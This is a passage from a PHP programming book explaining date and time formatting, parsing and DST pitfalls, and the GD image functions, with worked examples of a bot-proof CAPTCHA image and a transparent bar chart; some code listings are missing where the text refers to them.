    20040617 16:16:17
    20040617 15:16:17

It's best not to touch the $is_dst parameter, because PHP usually interprets the date and time correctly.

If we replace all calls to mktime() by gmmktime(), the parameters passed to the function are treated as GMT time, with no time zones taken into account. With mktime(), the time zone that the server has configured is taken into

account. For instance, if you are on Central European Time (CET), passing the same parameters as shown previously to gmmktime() outputs times that are one hour "later." Because the date() function does take into account time zones, the generated GMT timestamp is treated as a CET time zone, resulting in times that are one hour later for non-DST times and two hours later for DST times (CEST is CET+1).

9.4.2 Formatting Date and Time

Making a GMT date with gmmktime() and then showing it in the current time zone with the date() function doesn't make much sense. Thus, we also have two functions for formatting date/time: date() to format a local date/time, and gmdate() to format a GMT date/time. Both functions accept exactly the same parameters. The first parameter is a format string (more about that in a bit), and the second is an optional timestamp. If the timestamp parameter is not included, the current time is used in formatting the output. date() and gmdate() always format the date in English, not in the current "locale" that is set on your system. Two functions are provided to format local time/date according to locale settings: strftime() for local time and gmstrftime() for GMT times. Table 9.6 describes formatting string characters for both functions. Note that the (gm)strftime() formatting options are prefixed with a %.

Table 9.6 Date Formatting Modifiers

Description | date / gmdate | strftime / gmstrftime | Remarks
AM/PM | A | |
am/pm | a | %p | Either am or pm for the English locale. Other locales might have their replacements (for example, nl_NL has an empty string here).
Century, numeric two digits | | %C | Returns the century number: 20 for 2004, and so on.
Character, literal % | | %% | Use this to place a literal % character inside the formatting string.
Character, newline | | %n | Use this to place a newline character inside the formatting string.
Character, tab | | %t | Use this to place a tab character inside the formatting string.
Day count in month | t | | Number of days in the month defined by the timestamp.
Day of month, leading spaces | | %e | Current day in this month defined by the timestamp. A space is prepended when the day number is less than 10.
Day of month, leading zeros | d | %d | Current day in this month defined by the timestamp. A zero is prepended when the day number is less than 10.
Day of month, without leading zeros | j | | Current day in this month defined by the timestamp.

Table 9.6 Date Formatting Modifiers (continued)

Description | date / gmdate | strftime / gmstrftime | Remarks
Day of week, full textual | l | %A | For strftime(), the day is shown according to the names of the current locale (for example, Monday is shown as mandag).
Day of week, numeric (0 = Sunday) | w | %w | The range is 0-6 with 0 being Sunday and 6 being Saturday.
Day of week, numeric (1 = Monday) | | %u | The range is 1-7 with 1 being Monday and 7 being Sunday.
Day of week, short textual | D | %a | For the (gm)strftime() function, the name is shown according to the locale; for (gm)date() it is the normal three letter abbreviation: Sun, Sat, Wed, and so on.
Day of year, numeric with leading zeros | | %j | The day number in a year, starting with 001 for January 1 to 365 or 366.
Day of year, numeric without leading zeros | z | | The day number in a year, starting with 0 for January 1 to 364 or 365.
DST active | I | | Returns 1 if DST is active and 0 if DST is not active for the given timestamp.
Formatted, %m/%d/%y | | %D | Gives the same result as using %m/%d/%y.
Formatted, %H:%M:%S | | %T | Gives the same result as using %H:%M:%S.
Formatted, in 24-hour notation | | %R | The time in 24-hour notation without seconds.
Formatted, in a.m./p.m. | | %r | The time in 12-hour notation including seconds.

Table 9.6 Date Formatting Modifiers (continued)

Description | date / gmdate | strftime / gmstrftime | Remarks
Formatted, locale preferred date | | %x | The date in preferred locale format.
Formatted, locale preferred date and time | | %c | The date and time in preferred locale format.
Formatted, locale preferred time | | %X | The time in preferred locale format.
Hour, 12-hour format, leading zeros | h | %I |
Hour, 12-hour format, no leading zeros | g | |
Hour, 24-hour format, leading zeros | H | %H |
Hour, 24-hour format, no leading zeros | G | |
Internet time | B | | The swatch Internet time in which a day is divided into 1,000 units.
ISO 8601 | c | | Shows the date in ISO 8601 format: 2004-03-01T00:08:37+01:00
Leap year | L | | Returns 1 if the year represented by the timestamp is a leap year, or 0 otherwise.
Minutes, leading zeros | i | %M |

Table 9.6 Date Formatting Modifiers (continued)

Description | date / gmdate | strftime / gmstrftime | Remarks
Month, full textual | F | %B | For (gm)strftime(), the month name is the name in the language of the current locale.
Month, numeric with leading zeros | m | %m |
Month, numeric without leading zeros | n | |
Month, short textual | M | %b, %h |
RFC 2822 text | r | | Returns an RFC 2822 (mail) formatted text (Mon, 1 Mar 2004 00:13:34 +0100).
Seconds since UNIX epoch | U | |
Seconds, numeric with leading zeros | s | %S |
Suffix for day of the month, English ordinal | S | | Returns an English ordinal suffix for use with the j formatting option.
Time zone, numeric (in seconds) | Z | | Returns the offset to GMT in seconds. For CET, this is 3600; for EST, this is -18000, for example.
Time zone, numeric formatted | O | | Returns a formatted offset to GMT. For CET, this is +0100; for EST, this is -0500, for example.
Time zone, textual | T | %Z | Returns the current time zone name: CET, EST, and so on.
Week number, ISO 8601 | W | %V | In ISO 8601, week #1 is the first week in the year having four or more days. The range is 01 to 53, and you can use this in combination with %G or %g for the accompanying year.

Table 9.6 Date Formatting Modifiers (continued)

Description | date / gmdate | strftime / gmstrftime | Remarks
Year, numeric two digits with leading zeros | y | %y |
Year, numeric two digits; year component for %V | | %g | This number might differ from the "real year," as in ISO 8601; January 1 might still belong to week 53 of the year before. In that case, the year returned with this formatting option will be the one of the previous year, too.
Year, numeric four digits | Y | %Y |
Year, numeric four digits; year component for %V | | %G | This number might differ from the "real year," as in ISO 8601; January 1 might still belong to week 53 of the year before. In that case, the year returned with this formatting option will be the one of the previous year, too.

9.4.2.1 Example 1: ISO 8601 Week Numbers

This example shows that the ISO 8601 year format option (%G) might differ from the normal year format option (%Y) if the first week of a year has fewer than four days:

        echo gmstrftime( "%Y-%m-%d (%V %G, %A)\n", gmmktime(0, 0, 0, 1, $i, 2005) );
    }
    ?>

The script outputs

    2004-12-27 (53 2004, Monday)
    2004-12-28 (53 2004, Tuesday)
    2004-12-29 (53 2004, Wednesday)
    2004-12-30 (53 2004, Thursday)
    2004-12-31 (53 2004, Friday)
    2005-01-01 (53 2004, Saturday)
    2005-01-02 (53 2004, Sunday)
    2005-01-03 (01 2005, Monday)
    2005-01-04 (01 2005, Tuesday)
    2005-01-05 (01 2005, Wednesday)
    2005-01-06 (01 2005, Thursday)

As you can see, the ISO year is different for January 1 and 2, 2005, because the first week (Monday to Sunday) only has two days.

9.4.2.2 Example 2: DST Issues

Every year around October, at least 10-25 bugs are reported when a day is listed twice in somebody's overview. Actually, the day listed twice is the date on which DST ends, as you can see in this example:

When this script is run, you see the following output:

    2004-10-31 (00:00:00)
    2004-10-31 (23:00:00)
    2004-11-01 (23:00:00)
    2004-11-02 (23:00:00)

The 31st is listed twice because there are actually 25 hours between midnight, October 31 and November 1, not the 24 hours that were added in our loop. You can solve the problem in one of two ways. If you pick a different time of day, such as noon, the script will always have the correct date:

Its output is

    2004-10-29 (12:00:00)
    2004-10-30 (12:00:00)
    2004-10-31 (11:00:00)
    2004-11-01 (11:00:00)

However, there is still a difference in the time. A better solution is to abuse the mktime() function a little:

Its output is

    2004-10-30 (00:00:00) CEST
    2004-10-31 (00:00:00) CEST
    2004-11-01 (00:00:00) CET
    2004-11-02 (00:00:00) CET
    2004-11-03 (00:00:00) CET
    2004-11-04 (00:00:00) CET

We add the day offset to the mktime() parameter that describes the day of month. mktime() then correctly wraps into the next months and years and takes care of the DST hours, as you can see in the previous output.
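The day-offset technique just described might look like the following sketch. It is a reconstruction under assumptions, not the book's script: the time zone is set explicitly with date_default_timezone_set() (available from PHP 5.1) so that the result does not depend on the server configuration, and Europe/Amsterdam is chosen as a stand-in for CET.

```php
<?php
// Assumption: a Central European zone, set explicitly for reproducibility.
date_default_timezone_set('Europe/Amsterdam');

$lines = array();
for ($i = 0; $i < 6; $i++) {
    // Add the offset to the day-of-month argument instead of adding
    // 24 * 3600 seconds to a timestamp. mktime() normalizes day 32, 33, ...
    // into the next month and accounts for the DST change on October 31.
    $ts = mktime(0, 0, 0, 10, 30 + $i, 2004);
    $lines[] = date('Y-m-d (H:i:s) T', $ts);
}

echo implode("\n", $lines), "\n";
```

Every line shows midnight local time, and no date appears twice.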

9.4.2.3 Example 3: Showing the Local Time in Other Time Zones

Sometimes, you want to show a formatted time in the current time zone and in other time zones as well. The following script shows a full textual date representation for the U.S., Norway, the Netherlands, and Israel:

Figure 9.4 shows its output.

Fig. 9.4 March 1 in different locales.

Note: You need to have the locales and time-zone settings installed on your system before this will work. It is a system-dependent setting and not everything is always available on your system. If you're a Mac OS X user, have a look at http://www.macmax.org/locales/index_en.html to install locales.
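As a rough sketch of the time-zone half of this idea, the same timestamp can be formatted for several zones. This is not the book's script: it uses date_default_timezone_set() (PHP 5.1 or later) rather than system locale settings, the zone identifiers are assumptions standing in for the four countries, and date() prints English names only, so localized day and month names still need the locale-based functions described in the text.

```php
<?php
// One fixed moment: 2004-03-01 12:00:00 GMT.
$ts = gmmktime(12, 0, 0, 3, 1, 2004);

// Hypothetical zone choices for the U.S., Norway, the Netherlands, and Israel.
$zones = array(
    'America/New_York',
    'Europe/Oslo',
    'Europe/Amsterdam',
    'Asia/Jerusalem',
);

$shown = array();
foreach ($zones as $zone) {
    // Switch the zone used by date(), then format the same timestamp.
    date_default_timezone_set($zone);
    $shown[$zone] = date('l, j F Y H:i', $ts);
    echo $zone, ': ', $shown[$zone], "\n";
}
```

Only the displayed wall-clock time changes between iterations; the timestamp itself is the same for every zone.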

9.4.3 Parsing Date Formats

The opposite of formatting text is parsing a textual description of a date into a timestamp. The strtotime() function handles many different formats. In addition to the formats listed at http://www.gnu.org/software/tar/manual/html_chapter/tar_7.html, PHP also supports some extra ISO 8601 formats (http://www.w3.org/TR/NOTE-datetime). Table 9.7 contains a list of the most useful formats.

Table 9.7 Date/Time Formats as Understood by strtotime()

Date String | GMT Formatted Date | Remarks
1970-09-17 | 1970-09-16 23:00:00 | ISO 8601 preferred date.
9/17/72 | 1972-09-16 23:00:00 | Common U.S. way (m/d/yy).
24 September 1972 | 1972-09-23 23:00:00 | Without any specified time, 0:00 is used. Because the time zone is set to MET (GMT+1), the GMT formatted date is in the previous day.
24 Sep 1972 | 1972-09-23 23:00:00 |
Sep 24, 1972 | 1972-09-23 23:00:00 |
20:02:00 | 2004-03-01 19:02:00 | Without any date specified, the current date is used.
20:02 | 2004-03-01 19:02:00 |
8:02pm | 2004-03-01 19:02:00 |
20:02-0500 | 2004-03-02 01:02:00 | -0500 is the time zone (EST).
20:02 EST | 2004-03-02 01:02:00 |
Thursday, 1 Thursday, this Thursday | 2004-03-03 23:00:00 | A day name advances to the first available day with this name. In case the current day has this name, the current day is used.
2 Thursday 19:00 | 2004-03-11 18:00:00 | 2 is the second Thursday from now.
next Thursday 7pm | 2004-03-11 18:00:00 | Next means the next available day with this name after the first available day, and thus is the same as 2.
last Thursday 19:34 | 2004-02-26 18:34:00 | The Thursday before the current day. If the name of the day is the same as the current day, the timestamp of the previous day is used.
1 year 2 days ago | 2003-02-27 21:25:44 | The current time is used as the base for calculating the relative displacement.
-1 year -2 days | 2003-02-27 21:25:44 | The - sign is needed before every displacement unit; if it's not used, + is assumed. If "ago" is postfixed, the meaning of - and + is reversed. Other possible units are second, minute, hour, week, month, and fortnight (14 days).
-1 year 2 days | 2003-03-03 21:25:44 |
1 year -2 days | 2005-02-27 21:25:44 |
tomorrow | 2004-03-02 21:25:44 |
yesterday | 2004-02-29 21:25:44 |
20040301T00:00:00+1900 | 2004-02-29 05:00:00 | Used for WDDX parsing.

Table 9.7 Date/Time Formats as Understood by strtotime() (continued)

Date String | GMT Formatted Date | Remarks
2004W021 | 2004-01-04 23:00:00 | Midnight of the first day of ISO week 2 in 2004.
20041222 0915 | 2004-12-22 08:15:00 | Only numbers in the form yyyymmdd hhmm.

Using the strtotime() function is easy. It accepts two parameters: the string to parse to a timestamp and an optional timestamp. If the timestamp is included, the time is converted relative to the timestamp; if it's not included, the current time is used. Relative calculations apply only to the yesterday, tomorrow, and 1 year 2 days (ago) style format strings.

strtotime() parsing is always done with the current time zone, unless a different time zone is specified in the string that is parsed:

For more information on time zones, times, and calendars, see the excellent web site at http://www.timeanddate.com/.

9.5 GRAPHICS MANIPULATION WITH GD

Instead of describing all the GD functions that PHP supports, we discuss two common uses of the GD image library. In the first example, we use the GD libraries to build an image with a code word on it. We also add some distortions so that the image is machine-unreadable, which makes it the perfect protection against automatic tools that fill in forms. In the second example, we create a bar chart, including axis, labels, background, TrueType text, and alpha blending.

Our examples require the bundled GD library. For UNIX OSs, you need to compile PHP using the option --with-gd (without path). For Windows, you can use the packaged php_gd2.dll and enable it in php.ini. Because we make use of some additional functions of the GD library, you need to see the information, shown in Figure 9.5, in the GD section of your phpinfo() output (except for WBMP and XPM support).

Fig. 9.5 GD phpinfo() output.

A typical set of configuration options would be

    --with-gd --with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr

9.5.1 Case 1: Bot-Proof Submission Forms

The following script makes it difficult for automatic tools to submit forms. The steps involved in this basic script are create a drawing space, allocate colors, fill the background, draw characters, add distortions, and output the image to the browser:

For this to work, you need to store the code in a database and read it back in the script generating the image, for example with a random key, as in something like this:

    mysql_connect();
    $res = mysql_query('SELECT code FROM codes WHERE key='. (int) $_GET['key']);
    $code = mysql_result($res, 0);

and embed it into the HTML page with:

    /* Create canvas */
    $img = imagecreatetruecolor($size_x, $size_y);

With imagecreatetruecolor(), we create a new "canvas" to draw on with 256 different shades of red, green, and blue available, and an alpha channel per pixel. PHP provides another variant, imagecreate(), that can be used to create "paletted images" with 256 colors maximum, but imagecreatetruecolor() is used more often because images produced by it usually look better. Both JPEG and PNG files support true color images, so we use this function for our PNG file.

The default background is black. Because we want to change the background, we need to "allocate" some colors, as follows:

    /* Allocate colors */
    $background = imagecolorallocate($img, 255, 255, 255);
    $border = imagecolorallocate($img, 128, 128, 128);
    $colors[] = imagecolorallocate($img, 128, 64, 192);
    $colors[] = imagecolorallocate($img, 192, 64, 128);
    $colors[] = imagecolorallocate($img, 108, 192, 64);

In the previous code, we use imagecolorallocate() to define five different colors: $background, $border, and $colors, an array containing three colors to use in rendering the text. In each function call, we pass the variable $img (the image resource returned by the imagecreatetruecolor() function earlier in the script), followed by three parameters specifying color values. The first specifies the amount of red in the color, the second specifies a value for the green channel, and the third indicates the amount of blue in the color. The color values can range from 0 to 255. For example, white is specified by 255, 255, 255 (the highest possible color value for all three channels) and black is specified by 0, 0, 0 (the lowest possible color value for all three channels). In the script, $background is white and $border is defined with color values of 50%, which is gray. You can add more colors if you wish.

    /* Fill background */
    imagefilledrectangle($img, 1, 1, $size_x - 2, $size_y - 2, $background);
    imagerectangle($img, 0, 0, $size_x - 1, $size_y - 1, $border);

By using the two functions, we change the background color to white and add the gray border. Both functions accept the same parameters: the image resource, the coordinates of the top-left corner, the coordinates of the bottom-right corner, and the color. The coordinates range from 0, 0 to size_x - 1, size_y - 1, so we draw a filled rectangle from position 1, 1 to size_x - 2, size_y - 2. We also draw a gray border around the edge of the image.

    /* Draw text */
    for ($i = 0; $i < strlen($code); $i++) {
        $color = $colors[$i % count($colors)];
        imagettftext(
            $img,
            28 + rand(0, 8),
            -20 + rand(0, 40),
            ($i + 0.3) * $space_per_char,
            50 + rand(0, 10),
            $color,
            'arial.ttf',
            $code{$i}
        );
    }

In this code, we loop through all the characters in our code string. First, we pick the next element in the colors array. We use the modulo (%) operator to be sure we have an element with this key in the array. Next, we use the imagettftext() function to draw the letter. We pass the parameters shown in Table 9.8 to imagettftext().

Table 9.8 Parameters to imagettftext()

Parameter | Content | Remarks
img | $img | The image resource on which to draw.
fontsize | 28 + rand(0, 8) | The size in points (not pixels) of the characters to be drawn. For randomness, we select a size between 28 and 36 points.
angle | -20 + rand(0, 40) | The angle in which the character is drawn in degrees (the range is 0–360). We use it here to “twist” the characters a bit, which makes it harder for an automatic tool to read it.
x | ($i + 0.3) * $space_per_char | The x location where the character is drawn (also some additional randomness here).
y | 50 + rand(0, 10) | The y location for the character. This is not the upper limit, but the place where the baseline of the character is drawn. The baseline is usually the location of the lower boundary of characters without any tails, such as s (and not p).
color | $color | The color to use for drawing the text.
font | 'arial.ttf' | The name of the font file to use.
text | $code{$i} | The character from the code that we draw.
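The per-character parameters in Table 9.8 can be computed separately from the drawing call, which makes the ranges easy to inspect. The following is only a minimal sketch, not part of the script: the helper name glyph_layout() and the sample values are assumptions, and mt_rand() stands in for rand().

```php
<?php
// Hypothetical helper: computes the imagettftext() arguments for each
// character of $code without touching GD, so the ranges can be inspected.
function glyph_layout($code, array $colors, $space_per_char)
{
    $layout = array();
    for ($i = 0; $i < strlen($code); $i++) {
        $layout[] = array(
            // Modulo keeps the index inside the colors array.
            'color' => $colors[$i % count($colors)],
            'size'  => 28 + mt_rand(0, 8),     // 28..36 points
            'angle' => -20 + mt_rand(0, 40),   // -20..20 degrees
            'x'     => ($i + 0.3) * $space_per_char,
            'y'     => 50 + mt_rand(0, 10),    // baseline, 50..60
            'text'  => $code[$i],
        );
    }
    return $layout;
}

// Sample values (assumptions): three color handles, 40 pixels per character.
$layout = glyph_layout('A7KQ2', array(10, 20, 30), 40);
```

With three colors and five characters, the fourth character reuses the first color, which is the wrap-around the modulo operator provides.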

    /* Adding some random distortions */
    imageantialias($img, true);

This line turns on anti-aliasing. Anti-aliasing is a technique to create smoother lines. Because it is much better explained with an image, see the effect in Figure 9.6.

Fig. 9.6 Anti-aliasing (panels: Not anti-aliased, Anti-aliased).

Tip: Text drawn with the imagettftext() function is always anti-aliased. If you do not want this, you need to use a negative color number (like -$color) in the previous example. This trick does not work for totally black colors because the handle returned for black in a true color image is just 0. Because 0 is the same as -0 for PHP, the anti-aliasing is not turned off. You can easily work around this by allocating black with $black = imagecolorallocate($img, 0, 0, 1) (changing one of the components from 0 to 1).

    for ($i = 0; $i < 1000; $i++) {
        $x1 = rand(5, $size_x - 5);
        $y1 = rand(5, $size_y - 5);
        $x2 = $x1 - 4 + rand(0, 8);
        $y2 = $y1 - 4 + rand(0, 8);
        imageline($img, $x1, $y1, $x2, $y2,
            $colors[rand(0, count($colors) - 1)]
        );
    }

We draw 1,000 small lines with randomized coordinates for both the start and end. The imageline() function has the following parameters: image resource, starting x and y coordinates, ending x and y coordinates, and the color with which to draw the line.

    /* Output to browser */
    header('Content-type: image/png');
    imagepng($img);
    ?>
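Why negating black has no effect becomes clearer when we look at how a true-color handle is built: in a true-color image, the value returned by imagecolorallocate() is the packed RGB value. The sketch below reproduces that arithmetic in plain PHP; the function name truecolor_handle() is an assumption made for illustration.

```php
<?php
// Hypothetical helper mirroring how a true-color handle packs its components.
function truecolor_handle($red, $green, $blue)
{
    return ($red << 16) | ($green << 8) | $blue;
}

$black     = truecolor_handle(0, 0, 0);   // packs to 0
$nearBlack = truecolor_handle(0, 0, 1);   // packs to 1

// -0 is still 0, so negation cannot mark black as "not anti-aliased".
var_dump(-$black === $black);             // bool(true)

// The near-black workaround yields a handle that does change when negated.
var_dump(-$nearBlack === $nearBlack);     // bool(false)
```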

At the end of our script, we use the header() function to tell the browser to expect data representing image/png. This mime-type is associated with a PNG image by the browser, so that it knows how to handle the data properly. Different data types have different mime types. For images, you can specify image/gif (for GIF images), image/jpeg (for JPEG images), application/octet-stream (for binary data), and other mime types. With the Content-type HTTP header, we tell the browser what to expect. The header() function can only be used if no content is output before the header statement. That means no whitespace, no HTML tags, nothing at all. If output is sent before the header statement, you receive a warning like the following:

    Warning: Cannot modify header information - headers already sent by (output started at /dat/docs/book/gd/no-bot.php:2) in /dat/docs/book/gd/no-bot.php on line 53

Finally, we call the imagepng() function, which accepts the image resource as its first parameter. It accepts a second optional parameter: a file name where the image will be stored. If the second parameter is not included, the function “echoes” all image data to the browser. Figure 9.7 shows the image output by the preceding script.

Fig. 9.7 Output of the anti-bot script.

Each image type has a specific output function. Two functions are imagewbmp(), for WBMP images (some wireless format), and imagejpeg(), for JPEG images. In addition to the two parameters $img and $filename, the JPEG output function accepts a third parameter that is the compression quality of the JPEG image. The default value is 75. A value of 100 gives the best quality image, but even with this value, you might still encounter little distortions in the image. For a better quality image, use a PNG image.
If you want to change the default quality setting but don’t want to save the image to a file, you need to set the second parameter of imagejpeg() to an empty string, as in

    imagejpeg($img, '', 95);

It’s best to use JPEG images with a quality greater than 85 for photos, and PNG images for line-based images such as charts, because PNG gives a better result for those. You can see the difference clearly in Figure 9.8, which is a closeup of the bar chart image we will create in the second example.

Fig. 9.8 Comparing 75 percent quality JPEG and PNG.

The left image is created with imagejpeg($img) and the right one with imagepng($img). You can see clearly that the JPEG image is not really sharp. JPEG images have the advantage in size. They are usually much smaller than PNG images. In this specific example, the full JPEG image is 44KB and the PNG image is 293KB.

9.5.2 Case 2: Bar Chart

Figure 9.8 already gave you a peek at the chart we will make. Some keywords include background, transparent bars, and TrueType text positioning.

    5300,
    2000 => 5700,
    2001 => 6400,
    2002 => 6700,
    2003 => 6600,
    2004 => 7100
    );
    $max_value = 8000;
    $units = 500;

The $values array defines our data set from which we will draw the bars on our chart. Normally, you would not hardcode those values into your script. Rather, the values would come from another source such as a database. The $max_value variable defines the maximum value in the chart and is used for the automatic scaling of the values. The $units variable defines the distance, in data units, between the horizontal lines of the grid.

    $img = imagecreatetruecolor($size_x, $size_y);
    imageantialias($img, true);
    imagealphablending($img, true);

As before, we create a true-color image and turn on anti-aliasing. The call to imagealphablending() is not always needed because true is the default setting for true-color images. Alpha blending is a technique to “blend” new pixels being drawn onto an image by using its alpha channel. We need to use the function here because we want our bars on the chart to be transparent (letting us see the background through the image). Transparency is a color property for PHP, defined in the fifth parameter to imagecolorallocatealpha(), which is used later in the script.

    $bg_image = '../images/chart-bg.png';
    $bg = imagecreatefrompng($bg_image);
    $sizes = getimagesize($bg_image);

The previous section of the script loads the background image with imagecreatefrompng(). Similar functions for reading JPEG files (imagecreatefromjpeg()) and GIF files (imagecreatefromgif()) are available. getimagesize() is a function that returns an array containing the width and height of an image, along with additional information. The width and height are the first two elements in the array. The third element is the type of image. The fourth element is a text string, width="640" height="480", that you can embed into HTML where needed. PHP can determine the size of about 18 different file types, including PNG, JPEG, GIF, SWF (Flash files), TIFF, BMP, and PSD (Photoshop). With the image_type_to_mime_type() function, you can transform the type in the array to a valid mime type like image/png or application/x-shockwave-flash.

    imagecopyresampled(
        $img, $bg,
        0, 0, 0, 0,
        $size_x, $size_y, $sizes[0], $sizes[1]
    );

We copy the PNG we read from file onto the destination image, our chart. The function requires 10 parameters. The first two are the handle of the destination image and the handle of the loaded PNG image, followed by four pairs of values: the top-left coordinates for the destination image, the top-left coordinates of the source image, the width and height of the destination area, and the width and height of the source area. You can copy a part of the source image onto the destination image by using the appropriate coordinates and sizes for the source image. The imagecopyresized() function also copies images and is faster, but the result is not as good because the algorithm is less capable.
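The layout of the array returned by getimagesize() can be checked without a file on disk. This sketch assumes PHP 5.4 or later for getimagesizefromstring() and uses a 1x1 GIF embedded as base64 purely as sample data. According to the PHP manual, index 2 holds the IMAGETYPE_* constant and index 3 holds the HTML attribute string.

```php
<?php
// A 1x1 GIF, embedded so the example needs no external file (sample data).
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==');

$info = getimagesizefromstring($gif);

$width  = $info[0];                           // width in pixels
$height = $info[1];                           // height in pixels
$mime   = image_type_to_mime_type($info[2]);  // index 2: IMAGETYPE_* constant
$attrs  = $info[3];                           // index 3: width="..." height="..."

echo "$width x $height, $mime, <img $attrs>\n";
```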

    /* Chart area */
    $background = imagecolorallocatealpha($img, 127, 127, 192, 32);
    imagefilledrectangle(
        $img,
        20, 20, $size_x - 20, $size_y - 80,
        $background
    );
    imagefilledrectangle(
        $img,
        20, $size_y - 60, $size_x - 20, $size_y - 20,
        $background
    );

We draw the two bluish areas on the background image: one for the chart and one for the title. Because we want the areas to be transparent, we create a color with an alpha value of 32. The alpha value must lie between 0 and 127, where zero means a fully opaque color and 127 means fully transparent.

    /* Values */
    $barcolor = imagecolorallocatealpha($img, 0, 0, 128, 80);
    $spacing = ($size_x - 140) / count($values);
    $start_x = 120;
    foreach ($values as $key => $value) {
        $x1 = $start_x + 0.2 * $spacing;
        $x2 = $start_x + 0.8 * $spacing;
        $y1 = $size_y - 120;
        $y2 = $y1 - (($value / $max_value) * ($size_y - 160));
        imagefilledrectangle($img, $x1, $y1, $x2, $y2, $barcolor);
        $start_x += $spacing;
    }

We draw the bars (as defined in the $values array created at the beginning of the script) with the imagefilledrectangle() function. We calculate the spacing between the bars by dividing the width available for the bars (image width minus the outside margins, which total 140: 120 on the left and 20 on the right) by the number of values in our array. The loop increments the $start_x component by the correct amount and the bar is drawn from 20 percent to 80 percent of its available horizontal space. Vertically, we take into account the maximum drawable value and adjust the size accordingly.

    /* Grid */
    $black = imagecolorallocate($img, 0, 0, 0);
    $grey = imagecolorallocate($img, 128, 128, 192);
    for ($i = $units; $i <= $max_value; $i += $units) {
        $x1 = 110;

        $y1 = $size_y - 120 - (($i / $max_value) * ($size_y - 160));
        $x2 = $size_x - 20;
        $y2 = $y1;
        imageline(
            $img,
            $x1, $y1, $x2, $y2,
            ($i % (2 * $units)) == 0 ? $black : $grey
        );
    }

    /* Axis */
    imageline($img, 120, $size_y - 120, 120, 40, $black);
    imageline(
        $img,
        120, $size_y - 120, $size_x - 20, $size_y - 120,
        $black
    );

The grid and axis are drawn in a similar way. The only thing worth mentioning is that we color every second horizontal line black and the others gray.

    /* Title */
    $c_x = $size_x / 2;
    $c_y = $size_y - 40;
    $box = imagettfbbox(20, 0, 'arial.ttf', $title);
    $sx = $box[4] - $box[0];
    $sy = $box[5] + $box[1];
    imagettftext(
        $img,
        20, 0,
        $c_x - $sx / 2, $c_y - ($sy / 2),
        $black,
        'arial.ttf', $title
    );

We want to draw the title in the exact middle of our bottom blue bar. Therefore, we need to calculate the exact space (bounding box) required for our text. We use imagettfbbox() to do this. The parameters passed are the fontsize, angle, fontfile, and the text. These parameters need to be the same as for the text we are drawing later. The function returns an array with eight elements, grouped by two, to provide the coordinates of the four corners of the bounding box. The groups stand for the lower-left corner, the lower-right corner, the upper-right corner and the upper-left corner. In Figure 9.9, you can see the bounding box drawn around the text “Imågêß?”.
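The centering arithmetic used for the title can be isolated in a small function. This is a sketch under assumptions: the function name centered_origin() and the sample bounding box are made up for illustration, and the array is laid out the way imagettfbbox() returns it (lower-left, lower-right, upper-right, upper-left).

```php
<?php
// Hypothetical helper: given a bounding box in imagettfbbox() layout and a
// desired center point, return the x/y origin to pass to imagettftext().
function centered_origin(array $box, $c_x, $c_y)
{
    $sx = $box[4] - $box[0];   // upper-right x minus lower-left x: the width
    $sy = $box[5] + $box[1];   // upper-right y plus lower-left y (signed)
    return array($c_x - $sx / 2, $c_y - $sy / 2);
}

// Sample box (assumption): text 100 pixels wide, rising 20 pixels above the
// baseline and dropping 4 pixels below it.
$box = array(-1, 4, 99, 4, 99, -20, -1, -20);

list($x, $y) = centered_origin($box, 200, 100);
```

For this sample box the baseline lands 8 pixels below the requested center, so the box spans y = 88 to y = 112 and its middle sits at y = 100.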

Fig. 9.9 Different measurements for TrueType.

The baseline (x) and (y) axis drawn in Figure 9.9 are the 0-lines to which the bounding box coordinates are related. As you can see, the left side is not exactly zero. In addition, the bottom of the normal letters is on the baseline, with the “tails” below the baseline. To calculate the width of the text to be drawn, we subtract Element 0 (lower-left x) from Element 4 (upper-right x); to calculate the height, we add Element 1 (lower-left y) to Element 5 (upper-right y). Because y values above the baseline are negative, this sum is a signed value, and half of it is the offset of the vertical center of the text from the baseline. The resulting sizes can then be used to center the text on the image. Calculating sizes with the bounding box only works reliably for angles of 0, 90, 180, and 270. The GD library does not calculate the bounding boxes totally correctly, but this problem does not affect the angles mentioned.

    $c_x = 50;
    $c_y = ($size_y - 60) / 2;
    $box = imagettfbbox(14, 90, 'arial.ttf', $title2);
    $sx = $box[4] - $box[0];
    $sy = $box[5] + $box[1];
    imagettftext(
        $img,
        14, 90,
        $c_x - ($sx / 2), $c_y - ($sy / 2),
        $black,
        'arial.ttf', $title2
    );

We do the same for the title for the Y axis, except that we use an angle of 90. The rest of the code remains the same.

    /* Labels */
    $c_y = $size_y - 100;
    $start_x = 120;
    foreach ($values as $label => $dummy) {
        $box = imagettfbbox(12, 0, 'arial.ttf', $label);
        $sx = $box[4] - $box[0];
        $sy = $box[5] + $box[1];
        $c_x = $start_x + (0.5 * $spacing);
        imagettftext(
            $img,
            12, 0,

            $c_x - ($sx / 2), $c_y - ($sy / 2),
            $black,
            'arial.ttf', $label
        );
        $start_x += $spacing;
    }

    $r_x = 100;
    for ($i = 0; $i <= $max_value; $i += ($units * 2)) {
        $c_y = $size_y - 120 - (($i / $max_value) * ($size_y - 160));
        $box = imagettfbbox(12, 0, 'arial.ttf', $i / 100);
        $sx = $box[4] - $box[0];
        $sy = $box[5] + $box[1];
        imagettftext(
            $img,
            12, 0,
            $r_x - $sx, $c_y - ($sy / 2),
            $black,
            'arial.ttf', $i / 100
        );
    }

In the previous code, we draw the different labels. The ones for the X axis are not interesting, but for the Y axis, we try to align the text on the right margin by not dividing the width of the text to be drawn by 2.

    /* Output to browser */
    header('Content-type: image/png');
    imagepng($img);
    ?>

With those final lines, we output the bar chart to the browser. The result can be seen in Figure 9.10.
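The bar geometry used in the chart script can be checked on its own, without GD. The following is a minimal sketch: the function name bar_rect() and the 640x480 sample size are assumptions, while the margins are the ones the script uses.

```php
<?php
// Hypothetical helper: returns the rectangle (x1, y1, x2, y2) of bar number
// $index, using the same margins as the chart script (120 left, 20 right,
// baseline 120 pixels above the bottom, 160 pixels of vertical margin).
function bar_rect($index, $value, $count, $size_x, $size_y, $max_value)
{
    $spacing = ($size_x - 140) / $count;
    $start_x = 120 + $index * $spacing;

    $x1 = $start_x + 0.2 * $spacing;   // bar starts at 20% of its slot
    $x2 = $start_x + 0.8 * $spacing;   // and ends at 80% of its slot
    $y1 = $size_y - 120;               // bottom of the bar: the X axis
    $y2 = $y1 - (($value / $max_value) * ($size_y - 160));

    return array($x1, $y1, $x2, $y2);
}

// Sample numbers (assumptions): a 640x480 image holding 5 bars.
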